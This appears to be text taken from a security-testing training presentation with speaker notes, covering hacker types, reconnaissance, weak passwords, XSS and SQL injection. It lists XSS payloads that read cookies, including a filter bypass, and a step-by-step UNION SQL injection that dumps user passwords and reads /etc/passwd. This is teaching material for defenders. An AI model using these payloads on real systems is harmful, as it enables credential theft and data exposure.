Understand basics of testing security aspects like passwords, robots.txt. Understand SQL Injection and XSS attacks. Automation of them using ZAP proxy tool.
5. Define
Security Testing is a type of testing that
intends to uncover vulnerabilities of
the system and determine that its data
and resources are protected from
possible intruders.
Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose
Why do real hackers hack? What is their motivation?
Money?
Damage to opponent
Fame
Government does hacking to get information
Also known as ethical hackers, White Hat hackers are the good guys of the hacker world. They’ll help you remove a virus or PenTest a company.
Black Hat – Also known as crackers, these are the men and women you hear about in the news. They find banks or other companies with weak security and steal money or credit card information. The surprising truth about their methods of attack is that they often use common hacking practices they learned early on.
Gray Hat – Nothing is ever just black or white; the same is true in the world of hacking. Gray Hat hackers don’t steal money or information (although, sometimes they deface a website or two), yet they don’t help people for good (but, they could if they wanted to). These hackers comprise most of the hacking world, even though Black Hat hackers garner most (if not all) of the media’s attention.
Infrastructure Security Testing
Hack windows machine to get full control
Causing network to go down
Application Security Testing
JIRA installed on a local server
When do you do security testing???
When should we do security testing?
Reconnaissance - mission to obtain information by visual observation or other detection methods
a vulnerability is a weakness which allows an attacker to reduce a system's information assurance
Exploit - causing unintended or unanticipated behaviour to occur on computer software, hardware, or something electronic (usually computerised) by taking advantage of vulnerabilities
http://www.hackingtheuniverse.com/
i don’t like these guys
i want to do some damage
how do i start hacking
lets think
any ideas???
Show them wappalyzer.
It shows versions as well. If the version of some software they are using has known vulnerabilities, that can be exploited.
Example: http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/
Show
Wappalyzer
Robots.txt
Admin login screen
Task ->
http://www.hackingtheuniverse.com/
i don’t like these guys
i want to do some damage
how do i start hacking
lets think
any ideas???
Show them wappalyzer.
It shows versions as well. If the version of some software they are using has known vulnerabilities, that can be exploited.
Example: http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/
Show
Wappalyzer
Robots.txt
Admin login screen
Task ->
Ask for details of password
It is recommended to use more than 8 characters in password. How many have less than 8 characters password for email?
How many have only small case?
Blah….
What would be your guess for their password
What we were doing here is applying social engineering techniques to get to know your passwords or other important information.Can we really get details by just talking and not using a computer?
Let’s see a video.
https://www.youtube.com/watch?v=lc7scxvKQOo
Default username and password like admin password for admin consoles.
People use very common passwords (like password or just numbers, their names or dictionary words)
41% people use only lowercase password. Only about 4% use special characters in passwords
50% of people have password less than 8 characters in length (at least 8 is recommended)
XSS attacks are type of injection attacks in which the attacker injects malicious code in web pages that are viewed by other users of the application.
Basic using script tag
Ask if you can just sanitize script tag.. Show how to bypass that -> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
Ask if small text fields will prevent this attack
Tell them about intercepting requests
<a onmouseover="alert(1)" href="#">read this!</a>
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
Google Gruyere:
Stored XSS:
(New snippet)
<a onmouseover="alert(1)" href="#">read this!</a>
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
HTML encoding (< → <)
URL encoding before inserting it into HTML
HTML attribute encoding
CSS encoding
This HTTP response header enables the Cross-site scripting (XSS) filter built into some modern web browsers. This header is usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user.
HttpOnly flag is included in the HTTP response header, the cookie cannot be accessed through client side script
It happens when computers cannot tell difference between code and data
2
'
2' #
2' OR 1=1
2' Union select null #
2' union Select null, null #
2' Union Select null, @@version #
2' Union Select null, database() #
2' union select null, table_name from information_schema.tables #
2' union select null, table_name from information_schema.tables where table_name like '%user%' #
2' Union select null, column_name from information_schema.columns where table_name='users' #
1' Union select null, concat(user, 0x0a,password) from users #
2' Union select null, LOAD_FILE('/etc/passwd') #